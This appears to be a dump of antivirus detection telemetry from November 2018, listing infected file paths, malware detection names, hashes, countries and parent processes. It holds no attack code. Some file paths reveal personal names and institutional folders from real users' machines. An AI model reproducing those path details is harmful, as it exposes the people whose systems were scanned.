  Row(detection=Row(filename='7ba37c224b9b7e6c285e8a232471143ecd1804a9fa20498115f207294b2b6df7.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-15.available\\Avira\\7BA37C224B9B7E6C285E8A232471143ECD1804A9FA20498115F207294B2B6DF7.VIR', filesize=468000, name='Worm/Agent.2170901.#M1.#R1'), hash='7ba37c224b9b7e6c285e8a232471143ecd1804a9fa20498115f207294b2b6df7', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T08:35:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ehshell.exe', filepath='\\\\?\\C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='76898d0e42bffe87a2d42526163e4a8a8dd5d997884a9d0a58af5b3bff9025d9', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:22:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8e4cc0cfe015c7821462dc1dfe6c50485ea2c56b7e87f32b9d55f595665d0b56', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-15.available\\Avira\\8E4CC0CFE015C7821462DC1DFE6C50485EA2C56B7E87F32B9D55F595665D0B56', filesize=192000, name='TR/Crypt.XPACK.Gen.#M300.#R5139'), hash='8e4cc0cfe015c7821462dc1dfe6c50485ea2c56b7e87f32b9d55f595665d0b56', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T08:37:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='install_a.html', filepath='C:\\Program Files\\Adobe\\Adobe Bridge CS3\\resource\\adobe_epic\\personalization\\sl_SI\\install_a.html', filesize=136000, name='HTML/Drop.VBS.A.#M1.#R1'), hash='878dbd7529f499c1adf7efc17b062cc59fe5096ece1e1f8f9d3873a19253b3ba', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Smadav\\SMΔRTP.exe', parentsize=1675264, timestamp='2018-11-01T20:00:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp0000085c', filepath='C:\\Windows\\Temp\\tmp00000159\\tmp0000085c', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T11:38:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hpqdirec.exe', filepath='\\\\?\\C:\\Program Files\\HP\\Digital Imaging\\bin\\Hpqdirec.exe', filesize=960000, name='W32/Sality.AG.#M1.#R1'), hash='61f8a151c406fb205f4fca3224e876812a1fe9a6f78edab534c7e68cd447f797', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:14:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$r0yh5gk.exe', filepath='\\\\?\\C:\\$RECYCLE.BIN\\S-1-5-21-3862479230-2305681621-2083271188-1000\\$R0YH5GK.exe', filesize=284000, name='PUA/1ClickDownload.Gen.#M300.#R5544'), hash='350188a9922237521adfeea464dc39d8b1b35931baa3150a435f527fee61f230', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:42:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='german.exe', filepath='F:\\New folder\\Corel Draw 12\\German\\German.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T17:18:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ioc0832d6a1-00c7-c342-a978-fc8a519cc9cd.exe', filepath='C:\\programdata\\kaspersky lab\\avp18.0.0\\temp\\ioc0832D6A1-00C7-C342-A978-FC8A519CC9CD.exe', filesize=16416000, name='TR/Patched.Ren.Gen.#M300.#R4405'), hash='153672a8a39883d8fb5baf76454c9145ca648f8b6f3b8d32afe39dd96807095d', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-01T12:55:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='0e213e07ea6cf42e01e3d7c52538788cb8fcec3ea9a2e19556abf79652fd3486.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-10.available\\Avira\\0E213E07EA6CF42E01E3D7C52538788CB8FCEC3EA9A2E19556ABF79652FD3486.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0e213e07ea6cf42e01e3d7c52538788cb8fcec3ea9a2e19556abf79652fd3486', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:17:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002210-365beb1e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-002210-365BEB1E', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:22:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T13:14:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dealplylive.exe', filepath='\\\\?\\C:\\Program Files (x86)\\DealPlyLive\\Update\\DealPlyLive.exe', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:27:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-202622-b9848bae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_67007e69\\AVSCAN-20181101-094155-81A578CA\\AVSCAN-20181101-202622-B9848BAE', filesize=6848000, name='TR/Surveyer.6848000.#M1.#R1'), hash='82476d0e2c4ba1edf6d31c2539624fd63a6ddf6e7c880a385344cd6240dbb272', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:26:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='danh sách đối tượng.exe', filepath='H:\\\xa0\\Chuyen an ĐB718\\DANH SÁCH ĐỐI TƯỢNG.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='17a47a4fed25a13302f4391b35f928a044058cb35562ff1487f269af32f3a1a3', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T08:30:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152259-f9e429d7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_34479194\\AVSCAN-20181101-145012-DBA9C9B6\\AVSCAN-20181101-152259-F9E429D7', filesize=1856000, name='DR/FakePic.Gen.#M1.#R1'), hash='62987125e14fac787631c436a2314c69797a83ae30f5fad3284ad5d3c285cafd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:23:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.567\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.567\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T17:26:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000b2b7d', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp000b2b7d', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:54:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-214152-a3eec85e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3bb0366c\\AVSCAN-20181101-213427-6896695C\\AVSCAN-20181101-214152-A3EEC85E', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='1db53c54ad20a118b65f358848fc7ff3e91db289032d210e7bff3d72f24c178a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:41:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xerces-c_1_6_0.dll', filepath='D:\\AutoCAD2009\\x86\\xerces-c_1_6_0.dll', filesize=1536000, name='W32/Ramnit.A.#M1.#R1'), hash='44d73b70f5bc66adb08c739dd549e80534b79cc3b6a7507b3aea447f58425db0', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:34:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-153258-cb51d727', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1da8a17c\\AVSCAN-20181101-153226-C7EF38FC\\AVSCAN-20181101-153258-CB51D727', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T21:32:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hpqdirec.exe', filepath='\\\\?\\C:\\Program Files\\HP\\Digital Imaging\\bin\\Hpqdirec.exe', filesize=960000, name='W32/Sality.AG.#M1.#R1'), hash='61f8a151c406fb205f4fca3224e876812a1fe9a6f78edab534c7e68cd447f797', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:14:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-090631-0935295e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9aa61a38\\AVSCAN-20181101-223138-2600B995\\AVSCAN-20181102-090631-0935295E', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:31:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-220741-b54f8e3e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d335eb84\\AVSCAN-20181101-220720-B1344C49\\AVSCAN-20181101-220741-B54F8E3E', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:07:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='scmini.exe', filepath='c:\\program files (x86)\\smartcloudwbinput\\1.3.6.10911\\scmini.exe', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='65fe85d28b0ceda1371ad2d16579e0871d78f7a5885ffd4e0fbf4edfdc811b3d', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T08:29:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T19:51:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autoupdater.exe', filepath='C:\\MCoffline\\MCoffline\\programs\\Program Files\\loader\\Autoupdater.exe', filesize=2944000, name='W32/Neshta.A.#M1.#R1'), hash='7163430361a2a624a529c5014db1b9e654f43c4207850191223c8e6c885d2b9b', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:As6N7dGP00Kwq6vB.1', country='KZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122536, timestamp='2018-11-01T05:34:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='esercitazioni.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\ITALIANO\\esercitazioni.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:25:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='assistente familiare 1° livello.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\SOCIO SANITARI\\ASSISTENTE FAMILIARE 1° LIVELLO.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:13:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b478f1a0c4eaa3f21efdeef6aceee8a7e688d44862082fac5743a19d2bb4c0ea', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\B478F1A0C4EAA3F21EFDEEF6ACEEE8A7E688D44862082FAC5743A19D2BB4C0EA', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b478f1a0c4eaa3f21efdeef6aceee8a7e688d44862082fac5743a19d2bb4c0ea', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:29:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150904-f49bed63', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150904-F49BED63', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:09:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='brocca monica.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\ENGIM2014-2015\\engim varie\\STAGE 573160\\BROCCA MONICA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:27:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-222656-6b8b0f53', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-222645-6533CACD\\AVSCAN-20181101-222656-6B8B0F53', filesize=640000, name='TR/RedCap.xaclj.#M1.#R1'), hash='c980ed2cdf5a796dd132a46207a4e3e5f03675d66c465cff0294dad34b9591c4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:26:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f0286b0f130ef7664f7baa74f9b25a1dada3ded1ad8826fd741dc6df4642f9cd', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-16\\F0286B0F130EF7664F7BAA74F9B25A1DADA3DED1AD8826FD741DC6DF4642F9CD', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='f0286b0f130ef7664f7baa74f9b25a1dada3ded1ad8826fd741dc6df4642f9cd', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-16.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-17.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-18.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-19.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-20.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\archive.zip\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T05:59:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-225546-6c265c61', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9355894c\\AVSCAN-20181101-225445-618835A2\\AVSCAN-20181101-225546-6C265C61', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:55:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kmspico v10.1.7.exe', filepath='\\\\?\\F:\\Downloads\\Microsoft Office Visio & Project 2016 (Sjoerd)\\MS-Visio-Project-2016\\AutoPlay\\Docs\\KMSPico v10.1.7.exe', filesize=4096000, name='SPR/Hacktool.740032.#M1.#R1'), hash='e9d55ee4a70c77183040ee79643d6caef0ff6566c45a21ae2fccd0f85f7e6930', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:27:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\o5ekxefvz1l\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T03:29:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sss.dll', filepath='\\\\?\\C:\\Program Files (x86)\\Vugitpuwish\\_ALLOWDEL_7d9e3\\SSS.dll', filesize=960000, name='HEUR/AGEN.1031803.#M1.#R1'), hash='8edb20b4c3a60d66ee14e570a6c1656eeec650f1468d432a8baff292709ab787', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T15:44:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-222653-69d8e3c7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-222645-6533CACD\\AVSCAN-20181101-222653-69D8E3C7', filesize=640000, name='TR/RedCap.xaclj.#M1.#R1'), hash='c980ed2cdf5a796dd132a46207a4e3e5f03675d66c465cff0294dad34b9591c4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:26:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='justcloud.exe', filepath='C:\\Program Files\\JustCloud\\JustCloud.exe', filesize=1020000, name='TR/Trash.Gen.#M1.#R1'), hash='8d4654117e8a87ec07359af4c13f8210c7bb68f12dda60366d712c1b17ba5c38', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:06:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-180356-05663f4c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_61898b3d\\AVSCAN-20181101-180323-FE9A2D00\\AVSCAN-20181101-180356-05663F4C', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:03:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='21137[1].htm', filepath='C:\\Users\\X\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\MicrosoftEdge\\Cache\\UP83RKCA\\21137[1].htm', filesize=56000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='ba3ec70aa46b32062de3c8ca0c4e23df68829c095a3a07f42f6eeec5868437c3', metadata=Row(cmdline='-ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\SystemApps\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\MicrosoftEdgeCP.exe', parentsize=237384, timestamp='2018-11-01T11:38:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='unitprice_ปตร พร้อม สน คลองครุ[1].exe', filepath='\\\\?\\D:\\รังสิตใต้\\01-งานที่สำนัก ปี ก่อน-2554\\Cข้อมูลทั่วไป\\ข้อมูลรังสิตใต้-พี่ลา40\\SPEC49\\EX_ปตร\\UnitPrice_ปตร พร้อม สน คลองครุ\\ardv_suspicious_file(s)\\unitprice_ปตร พร้อม สน คลองครุ[1].exe', filesize=512000, name='TR/Patched.Ren.Gen.#M300.#R1795'), hash='af2218d85ff9165b2daa6dad3a35bca0f691d3ad2aa2e4c243b7f79719d0d3db', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:06:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='spy.exe', filepath='F:\\\xa0\\Spy\\Spy.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T02:29:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='conquer.exe', filepath='\\?\\J:\\العاب2\\Diamond Mine\\data\\{عربيات\\PlayConquer\\PlayConquer\\Conquer.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='86068ba1095bb6115f1b15cd7808d724057a244afd7e9bc4d4737099497a844d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:07:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='psichiatrico.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\SCHEDE CORSI SOCIOSANITARI\\PSICHIATRICO.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:16:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='emwinview.exe', filepath='E:\\softwere\\keil4.7\\ARM\\Segger\\emWin\\Tool\\emWinView.exe', filesize=124000, name='WORM/Autorun.14848.#M300.#R5130'), hash='b28a341093bb24af1aebafd73a975ac7eb06538547ce015b6027f700446b130a', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T11:00:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='eef8302801edda6a57d5776729c631bbff5bbfd211e2863d93821950dd18b098', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\EEF8302801EDDA6A57D5776729C631BBFF5BBFD211E2863D93821950DD18B098', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='eef8302801edda6a57d5776729c631bbff5bbfd211e2863d93821950dd18b098', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:14:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=2880000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='b65642242ab44c369f7a5f71b3ab9c77ab60d2b213c6902e16d68ce82953f9ff', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T12:44:28Z'), dt=datetime.date(2018, 11, 1)),
